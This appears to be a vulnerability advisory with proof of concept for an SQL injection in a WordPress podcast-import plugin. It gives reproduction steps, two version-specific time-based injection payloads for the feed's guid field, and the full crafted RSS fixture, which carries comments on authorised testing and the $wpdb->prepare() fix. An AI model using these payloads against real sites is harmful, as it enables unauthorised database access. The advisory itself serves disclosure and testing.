The plugin does not sanitise and properly escape some imported data, which could allow SQL injection attacks to be performed by importing a malicious podcast file.
Put the XML below on a web server (replacing PAYLOAD with the payload for the installed plugin version), then open the podcast import page (/wp-admin/tools.php?page=secondlinepodcastimport), enter the URL of the XML in the Podcast Feed URL field and click Import.
Payloads:
v < 1.3.0 - https://satchmo.secondlinethemes.com/?p=82%') union select (sleep(10));#
v < 1.3.8 - <![CDATA[https://satchmo.secondlinethemes.com/?p=82%") union select (sleep(5))#]]>
<?xml version="1.0" encoding="utf-8"?>
<!--
  Reproduction fixture: a minimal RSS 2.0 podcast feed with one channel and one item.
  Every field carries harmless filler except the item's guid, which holds the PAYLOAD
  placeholder. Use it only against an installation you are authorised to test.
  The import screen sits under /wp-admin/, so reaching it presumably requires an
  authenticated user with access to Tools; confirm the required role against the advisory.
-->
<?xml-stylesheet type="text/xsl"
href="https://dixie.secondlinethemes.com/wp-content/plugins/seriously-
simple-podcasting/templates/feed-stylesheet.xsl"?>
<!--
  NOTE(review): the href above is wrapped across two lines in this copy, so the URL
  contains a line break. The stylesheet only affects how a browser renders the feed.
-->
<!-- Root element: declares the RSS extension namespaces (content, wfw, dc, atom, sy, slash, itunes, googleplay). -->
<rss version="2.0"
xmlns:content="http://purl.org/rss/1.0/modules/content/"
xmlns:wfw="http://wellformedweb.org/CommentAPI/"
xmlns:dc="http://purl.org/dc/elements/1.1/"
xmlns:atom="http://www.w3.org/2005/Atom"
xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
xmlns:itunes="http://www.itunes.com/dtds/podcast-1.0.dtd"
xmlns:googleplay="http://www.google.com/schemas/play-podcasts/1.0">
<channel>
<!-- Channel metadata: static sample values copied from a demo feed. -->
<title>Dixie WordPress Theme</title>
<atom:link href="https://dixie.secondlinethemes.com/feed/podcast" rel="self" type="application/rss+xml" />
<link>https://dixie.secondlinethemes.com/</link>
<description>A Powerful Podcasting Theme</description>
<lastBuildDate>Mon, 09 Nov 2020 10:08:04 +0000</lastBuildDate>
<language>en-US</language>
<!-- NOTE(review): the first characters of the copyright text look like a mis-decoded copyright sign from the page capture. -->
<copyright>Ā© 2021 Dixie WordPress Theme</copyright>
<itunes:subtitle>A Powerful Podcasting Theme</itunes:subtitle>
<itunes:author>Dixie WordPress Theme</itunes:author>
<itunes:summary>A Powerful Podcasting Theme</itunes:summary>
<itunes:owner>
<itunes:name>Dixie WordPress Theme</itunes:name>
<itunes:email>[email protected]</itunes:email>
</itunes:owner>
<itunes:explicit>clean</itunes:explicit>
<googleplay:author>Dixie WordPress Theme</googleplay:author>
<googleplay:email>[email protected]</googleplay:email>
<googleplay:description>A Powerful Podcasting Theme</googleplay:description>
<googleplay:explicit>No</googleplay:explicit>
<!-- Single episode entry; the importer processes each item of the feed. -->
<item>
<title>Episode 10: New Recording Studios</title>
<link>https://dixie.secondlinethemes.com/podcast/episode-10-new-recording-studios/</link>
<pubDate>Wed, 24 Jul 2019 11:16:50 +0000</pubDate>
<dc:creator>Dixie</dc:creator>
<!--
  PAYLOAD is a placeholder for the version-specific test string listed with this feed.
  The guid text is attacker-controlled feed data; presumably the importer places it in a
  database query without binding it (confirm against the plugin source).
  The listed strings call sleep(), so a vulnerable importer shows up as an import request
  that takes noticeably longer than normal.
  Defensive fix: bind imported values with $wpdb->prepare() instead of concatenating them.
  The payload list covers versions below 1.3.8; confirm the fixed release before relying on it.
-->
<guid isPermaLink="false">PAYLOAD</guid>
<!-- The remaining text fields use the filler value "aa" inside CDATA sections. -->
<description>
<![CDATA[aa]]>
</description>
<itunes:subtitle>
<![CDATA[aa]]>
</itunes:subtitle>
<content:encoded>
<![CDATA[aa]]>
</content:encoded>
<!-- Enclosure: sample media reference (URL, byte length, MIME type). -->
<enclosure url="https://dixie.secondlinethemes.com/podcast-download/82episode-10-new-recording-studios.mp3" length="5425142" type="audio/mpeg"></enclosure>
<itunes:summary>
<![CDATA[aa]]>
</itunes:summary>
<itunes:explicit>clean</itunes:explicit>
<itunes:block>no</itunes:block>
<itunes:duration>02:16</itunes:duration>
<itunes:author>Dixie</itunes:author>
<googleplay:description>
<![CDATA[aa]]>
</googleplay:description>
<googleplay:explicit>No</googleplay:explicit>
<googleplay:block>no</googleplay:block>
</item>
</channel>
</rss>